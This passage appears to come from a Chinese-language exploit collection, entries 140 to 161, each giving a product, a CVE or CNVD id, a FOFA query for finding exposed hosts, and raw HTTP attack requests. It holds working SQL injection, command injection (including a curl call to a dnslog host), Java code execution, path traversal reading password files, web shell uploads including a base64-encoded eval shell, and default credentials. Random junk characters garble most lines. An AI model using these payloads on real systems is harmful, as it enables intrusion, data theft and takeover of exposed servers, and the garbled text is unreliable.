; z! `0 s+ A) T3 p! s) q9 z% @GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
" x& X! x- w8 U2 k: pHost: x.x.x.x, ^' A, @. ^( T# f9 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.09 m5 v8 h) o5 N; ?; w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ M9 R' v7 U0 F. M! h0 B- y% ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' ?% y; m" i( K: c- U" E
Accept-Encoding: gzip, deflate, br4 }8 Z$ {: f2 v0 L( v9 v+ Z
Connection: close) a/ H" s# u, U1 j7 U& T( ~! k
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk0 G1 v5 I6 I5 K6 _
Upgrade-Insecure-Requests: 1) D& K0 D1 I% L: `
+ s7 i. w/ t, b0 _6 _! b& B
. [ g. C& t i5 v1 g
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
. K+ e( U8 |7 N9 T8 CCVE-2024-25667 F* e+ u5 T7 v2 a d: [2 [
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"" X9 m' o# |$ p) A% s
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1) [+ X8 d. q% y0 e9 L' o5 C ?
Host: x.x.x.x K' _: v4 \! Y7 [; y4 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ S9 A! C) W8 z, [- [2 i0 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ [6 H! w8 B" E: [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, C" Z. b" ?6 Q! SAccept-Encoding: gzip, deflate, br1 \* }3 g5 b% O" L7 p
Connection: close
2 f2 c; w% s4 F# ]9 R) S# yCookie: authcode=h8g9
3 m4 }$ g9 S& [8 Z' B9 WUpgrade-Insecure-Requests: 13 @. C9 C: G$ E7 I
# `6 e5 S% @ \4 `
9 X3 Z5 C: b9 \7 y; I
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
% s2 f' c8 {, r, BFOFA:body="指挥调度管理平台"
3 k+ u# U% }- o: v) Y! wPOST /app/ext/ajax_users.php HTTP/1.1' i( f- T6 }) T, q4 h
Host: your-ip
/ E+ R) [& B/ e ^& y2 nUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
2 P" e M$ r1 s4 ?Content-Type: application/x-www-form-urlencoded
8 P/ L$ I! u1 n+ T
) _( J5 c) m& q
! E3 O( d& b: |$ d7 @, wdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
& w, y( ~7 A8 n# ]! d7 O2 V5 P& f, Y, M; ^! I! J: g$ O
5 T# E9 X' S( {+ s; d# B) U
142. CMSV6车辆监控平台系统中存在弱密码5 c4 Q7 K& W5 S' O% Q: V! Q
CVE-2024-29666' o0 _/ b5 g" [! ]/ S/ T
FOFA:body="/808gps/"3 b$ [( K; l0 W) u( ?
admin/admin
% v* b. K1 z% A' h) Z143. Netis WF2780 v2.1.40144 远程命令执行5 K7 E% s, A. \# J. U) R
CVE-2024-25850
}4 M T8 d! WFOFA:title='AP setup' && header='netis'/ J, E. f/ b/ F+ I
PAYLOAD# X% N" Y9 T& r3 I; r
& v9 y, N7 p: {/ O
144. D-Link nas_sharing.cgi 命令注入
& U& p) t4 L% y5 w& NFOFA:app="D_Link-DNS-ShareCenter"
: K1 ^; O4 `# y) }system参数用于传要执行的命令
& p8 c' D& n4 b- YGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1% b4 p: u1 O- b0 F9 |
Host: x.x.x.x9 i' o7 A. f: Q! j3 b# }
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" D1 B% a% S! b6 ^% j1 ?
Connection: close
+ r+ g! }$ ^/ M9 |7 KAccept: */*
' L+ S# {/ o4 bAccept-Language: en3 o( A* W& J7 y6 f. Q; { i' K
Accept-Encoding: gzip1 X3 I* x7 ^% E1 I. n5 d- q$ Y
P: }' Z. w8 @ J! x% e( h8 c4 n! c
/ z& }9 e/ @: i( [% U. V7 E145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
* W2 R+ V, N: A7 k8 ~' a& x- rCVE-2024-34008 I7 q' ~+ m: P9 c- {( g
FOFA:icon_hash="-631559155"
7 D' C* k# P2 q" UGET /global-protect/login.esp HTTP/1.1' ?. x9 b: ]( V! V. c9 X) p
Host: 192.168.30.112:1005. M% \. Y/ L! e# W6 h, E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.843 q# M0 O" Y$ i' g: m/ i
Connection: close
8 H. m p) }" U/ S$ _Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;- R$ @: T4 Q9 {+ t/ O5 v+ q
Accept-Encoding: gzip9 L: I0 k, [7 p7 q; ^; y( d2 K* Q. n
% G6 ^ t k" s( F) P
+ a x# U4 Q O. `# G. \146. MajorDoMo thumb.php 未授权远程代码执行$ ~& V8 q7 @; i2 \
CNVD-2024-02175( x6 R! [2 t* n! A! s
FOFA:app="MajordomoSL"
' t/ N+ E& _ A" ]7 N! OGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1# K+ g+ f0 N+ Y0 W9 ~$ {
Host: x.x.x.x7 b3 q3 e7 V4 Z2 r2 v0 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.843 b9 W, E1 x+ }. c9 \1 s8 D
Accept-Charset: utf-8
/ p* h4 A0 Q2 ^ h i$ t2 pAccept-Encoding: gzip, deflate. B f4 q/ C( K% @0 s7 q
Connection: close
; Z! H- d) B$ P
8 r% o( H/ X* l- V9 j. p& ?0 g. q: e ` `; r
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
0 F- ]/ ] C. ~) M7 z- Q) `5 tCVE-2024-323998 ^! @& q* L2 K
FOFA:body="RaidenMAILD"3 i: C7 a1 w$ ?0 f; z5 s+ n
GET /webeditor/../../../windows/win.ini HTTP/1.1
% y, L+ K- P! o5 n t2 a u5 yHost: 127.0.0.1:819 I) F. [' x9 q
Cache-Control: max-age=0
) I8 e" b# L6 b$ t: w+ zConnection: close
7 }1 j2 B1 `$ v# Y2 a
* j3 _& J, w+ o& k3 a: N0 w- V1 N# X% W& Z5 v! g9 Z
148. CrushFTP 认证绕过模板注入. ~' t7 b. m6 H6 |
CVE-2024-4040' d, N; Z, I2 P' u
FOFA:body="CrushFTP"3 F1 D. b3 t* C- k& n
PAYLOAD
1 o* o6 y9 L: K, G
/ J# n# ]: Q9 G1 c; `0 j, z149. AJ-Report开源数据大屏存在远程命令执行5 T. d8 [8 D( H) n5 ?' A
FOFA:title="AJ-Report"5 F3 q# h7 o& O t" ~2 U% @: `
- O& h2 _, |+ P# I, OPOST /dataSetParam/verification;swagger-ui/ HTTP/1.19 t' H* a- D! k4 Y
Host: x.x.x.x) p! T$ z; O, S$ S0 c$ v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ {6 | \# h4 f0 L& Y7 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 }7 f$ [% S# x* l% t5 n7 A* WAccept-Encoding: gzip, deflate, br
, ]7 y0 N. N( UAccept-Language: zh-CN,zh;q=0.9( a( H! a9 v1 d+ p
Content-Type: application/json;charset=UTF-8
# B2 b8 Q( e1 g4 k5 G+ n5 r7 T2 H! KConnection: close% p! S5 M' h) V7 a$ q4 Z
* x7 ~: x1 V- p n" c/ r
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} d0 X2 k- A* C* l- d! K
6 F% y9 ?- f& \2 _# S2 T' r
150. AJ-Report 1.4.0 认证绕过与远程代码执行
2 `& E- V, N& x! z/ YFOFA:title="AJ-Report"
: P z, ~% {% J) B' nPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
5 l& X9 A) e7 f: J& kHost: x.x.x.x
! |! a2 Z- g9 \7 P- {8 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% v4 n3 Y3 u6 K& f c: D) {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 D; S+ w) E+ a# [) D7 t
Accept-Encoding: gzip, deflate, br
1 O7 T6 _& w/ K6 OAccept-Language: zh-CN,zh;q=0.97 O$ q5 ]( {0 @
Content-Type: application/json;charset=UTF-82 B' N3 y. I9 v% J
Connection: close
. k. S+ P$ M0 O! t) m! Y$ ^1 mContent-Length: 3398 d v# N; ~# w: Y B& U% v
2 W& |! x, r/ T, `2 m) F. x
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
& Y% s6 Y% C7 U- w% g$ R6 r6 ^4 z1 A
6 E- a h% K0 q2 \" z7 \! u1 a# {" R- |
151. AJ-Report 1.4.1 pageList sql注入
4 x1 `" d, m( @9 C8 V& ^+ w- SFOFA:title="AJ-Report"
4 }4 B6 H$ D: IGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
* H4 w; I0 _& L& B( W: n8 cHost: x.x.x.x
J$ j0 f* l. v9 V0 ^/ ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 h M, |/ ?/ J
Connection: close2 l& n. z3 q" o
Accept-Encoding: gzip6 |$ [# [- {; G* m) ?! O
/ ?. ?4 S/ | Q
) j) C# B) J! O* B# n
152. Progress Kemp LoadMaster 远程命令执行
# | f( ~$ u; x+ o, w! M: LCVE-2024-1212# [3 E4 ?) X9 e f+ ^7 i: V
LoadMaster <= 7.2.59.2 (GA)$ E% z+ A/ E3 W
LoadMaster<=7.2.54.8 (LTSF)7 d9 Z3 g, c! S. c' z) J
LoadMaster <= 7.2.48.10 (LTS)& t$ q& u) T' w
FOFA:body="LoadMaster"8 i$ }5 C/ P0 Q* f
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码& W( V5 u! f4 l% v+ T+ \- I
GET /access/set?param=enableapi&value=1 HTTP/1.1
$ f3 F k2 b4 ZHost: x.x.x.x
1 k2 |0 B; H4 E( J. E! t& vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' \3 @( O& P7 G& ]( i
Connection: close: v$ t: J- P9 W6 ]: T
Accept: */*. ]. ?- @7 p9 A, h3 C) s9 w
Accept-Language: en5 y* U* U4 _* B/ n2 Q
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
8 p& V: h' ?8 ~; e! a& a9 d- B5 fAccept-Encoding: gzip
0 e$ x, G6 p; O+ }( b, I% d8 ~$ E# M+ \
1 h0 A9 \, I# }/ B; U& r1 p m* [0 g1 C; n153. gradio任意文件读取0 b/ Q- ^) x. r6 X* @
CVE-2024-1561FOFA:body="__gradio_mode__"
4 U% f7 n) R: P1 F- E0 P9 w第一步,请求/config文件获取componets的id
# v5 |) n* s+ I$ L" L' N, [http://x.x.x.x/config8 f& X# s2 U L) q2 F
; x3 y' V, u( \7 U6 i
7 t& h. x; t' \% x& y* k4 ~第二步,将/etc/passwd的内容写入到一个临时文件
" W6 U9 ?3 K' HPOST /component_server HTTP/1.1
/ x+ ~7 ~; D, | @9 r5 kHost: x.x.x.x
( Z* ^& t( Y" D/ o9 e# }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3& I% [, c4 T" ?3 ^
Connection: close |1 @7 w" \6 j0 ?0 Z
Content-Length: 115
4 E2 ]' n/ L) |/ b4 g0 v. F/ Z$ U0 A; RContent-Type: application/json: N1 C6 v4 H4 n; U, X! y* t
Accept-Encoding: gzip* Q- a2 ^; O7 \) }; z
" I7 P9 p/ o. {- E! y% ^5 l
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
! L% r! p+ h! b5 E) f/ V8 T! Z+ P3 ~
T% F; L2 Y$ X: c) n- \1 f$ {( |
第三步访问2 ~4 c+ t' I( ?1 @& E* @
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
/ l# M$ c) a$ f
8 w; g& [4 m7 ?* ^+ I7 t
1 F0 W9 ]) @8 }- c4 B154. 天维尔消防救援作战调度平台 SQL注入
* I; a( \8 ~7 q* i/ C4 {' w$ ?! KCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
9 h$ p9 h: K) O+ RPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
" W7 T8 u6 t/ \) @% FHost: x.x.x.x5 i6 N% H2 }% J
Content-Length: 106
4 ?, X( v4 }2 e3 Z1 y1 J7 ECache-Control: max-age=0
. G% r8 z) \ i% M* I! FUpgrade-Insecure-Requests: 1
$ h- n; P2 w' }$ x: zOrigin: http://x.x.x.x" ~- }+ O0 |: B, U) o4 Q
Content-Type: application/json
Y i0 v4 u; Z! Y! v3 c jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
* t: h; `6 T3 G! @6 z5 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ l9 I! Q; {9 X, @$ o
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page) X6 p0 r. ]1 s# m P% k, a3 O. e
Accept-Encoding: gzip, deflate
+ Y: d9 k# O9 f0 E: K2 fAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
! j- F4 ~% C% }Connection: close7 g! M1 d: z6 j3 W; T" I
" n4 ?, |, g6 Y( P% W- [
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}- ^ B8 W m' E( t( J3 m
M9 r. G& M. p8 h/ H6 k
9 S: l4 w) I9 S) T155. 六零导航页 file.php 任意文件上传 q$ H* A2 j( ]2 L2 ?$ @6 `3 W
CVE-2024-349825 \ e' W9 d3 _7 Q% ~4 c- \
FOFA:title=="上网导航 - LyLme Spage"
- i( v$ l# p/ m4 D' u9 S- v0 yPOST /include/file.php HTTP/1.1% u! v. U( w3 Q- O
Host: x.x.x.x0 r) v2 g: m" n6 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
# i& Y+ o- W/ |& iConnection: close
# s% k5 L) I* X0 m* S' ^8 [Content-Length: 232
: V" V- v q2 Z& J( s+ K, FAccept: application/json, text/javascript, */*; q=0.01
/ W8 i$ P. ?; k0 X& jAccept-Encoding: gzip, deflate, br3 }9 N( _1 ]9 G1 }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- g; V0 T: l1 I! XContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
6 k# c( l& a8 q/ E# y) PX-Requested-With: XMLHttpRequest
* E3 u5 D! v* Y# V7 M; ~& Z8 F: v+ {5 ^* ?
-----------------------------qttl7vemrsold314zg0f& y; X9 z/ p5 W" L+ S: A( I
Content-Disposition: form-data; name="file"; filename="test.php"% Z* ]3 X$ ]5 G( `8 T F8 ~ w9 o
Content-Type: image/png* i; l1 T K! Y9 G* e
& r' T. X. Q9 M3 t7 _; k( W5 Y<?php phpinfo();unlink(__FILE__);?>
5 \( e. _* D$ b% M+ Y( K& r-----------------------------qttl7vemrsold314zg0f--% N9 w5 q. q7 T# ^ K/ S3 w+ [$ R
+ s9 C6 a* f4 y4 }1 ^1 Y9 B% \- G# S& I( f
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php8 j# r/ {5 M( [5 W. I, x6 i
: S% N& |! e# Y% a8 ~5 K# f E
156. TBK DVR-4104/DVR-4216 操作系统命令注入' d# g* m' ~9 o7 O) Y) k8 k
CVE-2024-3721
3 ` R. p" F, r( Z5 }FOFA:"Location: /login.rsp", W# d2 A4 `; @+ o
·TBK DVR-4104
4 T6 O6 W5 `3 ^$ G" r·TBK DVR-4216
1 ]( O8 l/ G' v; N$ N8 J" Dcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"7 B& |8 v, _2 l. r$ w; a5 b# K/ u
, r r) s2 W( l' u$ m% N$ k, C# |5 V7 \+ Y/ y* J
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
7 L, o3 r8 [& y, p1 X3 V3 [) CHost: x.x.x.x
- ?% o3 O" u k$ a2 `( `User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ K$ _ S; N- F! N; KConnection: close$ B) s' M+ k' u3 t
Content-Length: 0
& w% w- C1 z6 yCookie: uid=1
8 B* ^, l6 _- W# O, O$ b4 _% F+ ^Accept-Encoding: gzip
2 E3 u, {5 I6 m8 p1 G, \: o6 @0 a# u
8 S9 `* r" s$ g# \& u# ` m157. 美特CRM upload.jsp 任意文件上传
. f* F. J! F5 N/ |CNVD-2023-06971
6 M4 u$ s! J/ ~, Q& b: C5 Z, \FOFA:body="/common/scripts/basic.js"+ Z. H* F# b+ s- x; w6 _- y
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.10 A0 Y4 @9 F& s( R J$ \' a
Host: x.x.x.x# n" o- B3 G& x' y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
2 ^! h) r; }8 H: B% ^. x; ~# zContent-Length: 709
Y6 n( f& g. h) r+ I. oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, K( A% ?0 N. h) ?/ c/ R6 q
Accept-Encoding: gzip, deflate
! r+ J! `$ R( E& X' z6 P5 Q# aAccept-Language: zh-CN,zh;q=0.9; [3 j+ r; q7 u3 L# R8 w) M' Q0 f
Cache-Control: max-age=0
: A8 u7 ~3 A# r! s h0 O* o* _4 yConnection: close
$ Z/ C5 A; {# ^( [% W% m# d2 P2 WContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN8 H9 r4 x& r |/ j) F
Upgrade-Insecure-Requests: 1
3 b* N1 r, y( a8 J" u& T" b* h* m- W! B2 G
------WebKitFormBoundary1imovELzPsfzp5dN
9 O" B" \$ u6 HContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
$ Q; C% {, A' l; F) NContent-Type: application/octet-stream- `7 i" @# g, ^" W! E3 f' ?- x
- ]8 A/ Y: E3 A8 cnyhelxrutzwhrsvsrafb8 Z5 T8 `. z( c0 [( ]; W
------WebKitFormBoundary1imovELzPsfzp5dN
8 K" D) W2 p2 Z1 S ~: B/ @Content-Disposition: form-data; name="key"1 _) y& ?" w e$ X6 Q# R
- Z1 E* s1 ~/ f! ]7 V6 Hnull v" I. Q; U. Y5 }
------WebKitFormBoundary1imovELzPsfzp5dN" A* @& i: g/ S K: R, {) E0 O
Content-Disposition: form-data; name="form"% e N6 [" b- T0 V1 B, x
0 e! B! H9 p7 E( z
null# p3 M& n4 p p2 o U
------WebKitFormBoundary1imovELzPsfzp5dN" R: O, s. }# W
Content-Disposition: form-data; name="field") n9 v$ W6 K3 Y1 z" x
& T4 y# M: B% n" f" R) L/ \0 dnull+ |5 X+ P3 x$ L& I# R6 e
------WebKitFormBoundary1imovELzPsfzp5dN9 L8 D6 z& k" P4 Q; C! ~
Content-Disposition: form-data; name="filetitile"2 O" ]$ G2 a) e
( L; d2 B% J; i4 Mnull% ?( y$ @7 m6 m* ?
------WebKitFormBoundary1imovELzPsfzp5dN" r/ D4 _+ ?: r* U
Content-Disposition: form-data; name="filefolder"* f. I1 f% A; g- X6 h3 n- G& k/ Q/ W( h
' D7 h% g' v+ p% m% L& F1 Tnull
% V% p' T7 Z7 y------WebKitFormBoundary1imovELzPsfzp5dN--
- }/ I7 @0 s/ W5 E R. u) X& w w# i1 \" Z) C# b T
% `- o6 ~* O! C2 _9 O
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp$ ~3 L0 C7 X7 e* o! P# L
* w" y) Y2 R* U8 J/ Y158. Mura-CMS-processAsyncObject存在SQL注入
) _+ B- t1 k- \: \4 RCVE-2024-32640. ^, i9 E2 q \+ {, h* A
FOFA:"Generator: Masa CMS"3 E% X" N$ A9 b
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1+ X- c0 N- H% c1 }7 Q5 |. ?, Z
Host: {{Hostname}}
- i7 b& W3 q2 r& Y. l6 n" f; m; W jContent-Type: application/x-www-form-urlencoded
8 J" c3 V) C4 W& w5 s4 h9 {6 N% L/ K; V. ~. {
object=displayregion&contenthistid=x\'&previewid=1
V5 ?. b2 v4 [3 N @) c
" b" ]( h8 p. Z# ^6 Q4 b. T# J5 P
0 R8 p& p& R: C* f159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传7 a) b+ p4 c' O7 U
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
" t I) c5 y u# ` ^1 }POST /webservices/WebJobUpload.asmx HTTP/1.1+ q! y* L" O3 U6 G7 u: d
Host: x.x.x.x" }# h/ G! g$ X( h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
) b: y* L5 Y# E6 c2 O0 hContent-Length: 1080& u/ l4 y) a, u3 H
Accept-Encoding: gzip, deflate& u) g+ W: I3 l
Connection: close
_( l- _6 s0 v6 ^$ t: ~4 ?" m- |Content-Type: text/xml; charset=utf-81 G; x1 U E4 F' U7 F
Soapaction: "http://rainier/jobUpload"6 ?! \: o( C. M" A; O& `
4 d5 K |, p1 W0 q" U% ]# ?: |% C
<?xml version="1.0" encoding="utf-8"?>+ n: i! n5 x. q0 _2 o0 r1 I5 w/ K
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
" q" ]. m! S( Y<soap:Body>
& n) I5 t1 s4 s& N$ h<jobUpload xmlns="http://rainier">
! |! L$ t7 x$ d( b+ n7 @8 P# m5 E<vcode>1</vcode>
; x8 o6 w" W% L ^<subFolder></subFolder>
" q0 b% H' _1 m: n* d$ z<fileName>abcrce.asmx</fileName>
/ R8 K- W9 ^( G/ R<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
, r* I7 ~/ h4 v3 K: v" S</jobUpload>
* f' [/ W( |* s9 w$ y# p0 \$ D9 u</soap:Body>
2 s0 K- K; V; X& q g' B</soap:Envelope> S6 Q h/ Y X% X$ A
; Y8 o# f: C1 c
3 E, z# }! C2 ~: e+ F' k0 t/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
7 Z4 f" ]3 v! j' G9 C; ]# o ~
0 }) w5 j8 C" q" t/ G
; u: W9 a9 B$ b2 B4 C160. Sonatype Nexus Repository 3目录遍历与文件读取
. E) |2 A3 a- v, ]6 x' L$ I5 r% ICVE-2024-4956 y9 D3 Q$ \, b' o; {4 D' N* y4 p
FOFA:title="Nexus Repository Manager"( y y5 \5 v6 E4 N% F
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
* u' m0 j2 n6 YHost: x.x.x.x
1 M5 K$ g& P* }1 q8 B4 CUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
- j' Z' Y1 X' H# a% ~. EConnection: close# u/ _2 X; a9 b
Accept: */*3 w9 h6 \& h, Z
Accept-Language: en( J% D) H' z! N2 n) B
Accept-Encoding: gzip
/ {5 l% j n" L, K; R
$ X5 Y4 |4 Z! y. N' E" b$ s1 I0 Y! X- P. z( Y% P T/ U
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传 j& D4 u T' d& i2 ]8 R
FOFA:body="/KT_Css/qd_defaul.css"& w( ?7 ^1 P& Z, J0 x, A7 N& {
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密! V2 k7 t k& \* k) j0 L8 l' @# |% H: G
POST /Webservice.asmx HTTP/1.12 R0 J, }' h( u- }$ r, M6 u
Host: x.x.x.x5 c" A2 q! e1 {0 }" y$ z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
& i0 ?" p" }! ]# n% ~" h& ^Connection: close
, a M$ R3 ^' }6 [8 |+ bContent-Length: 445
" _( | @ c" k) k: N# j9 s* jContent-Type: text/xml/ O; I" K- w+ g4 S# b8 s
Accept-Encoding: gzip
. L9 Q! L3 E! e8 |; E3 T8 t7 |5 p/ v" H# L! u( _2 {
<?xml version="1.0" encoding="utf-8"?>
- l- R5 R7 [7 P: e3 N* ^2 M! x<soap:Envelope xmlns:xsi="& U1 \# K5 }) d
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"- H- I q3 w# k/ a0 A ?
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">2 S4 H; ^) h7 Q5 f' Z/ r% B2 H% n
<soap:Body>. v3 Y1 ^/ f: T) y
<UploadResume xmlns="http://tempuri.org/">
* P# c5 R& o5 d9 x<ip>1</ip>& o& a# V) u- E4 y# J/ R
<fileName>../../../../dizxdell.aspx</fileName>
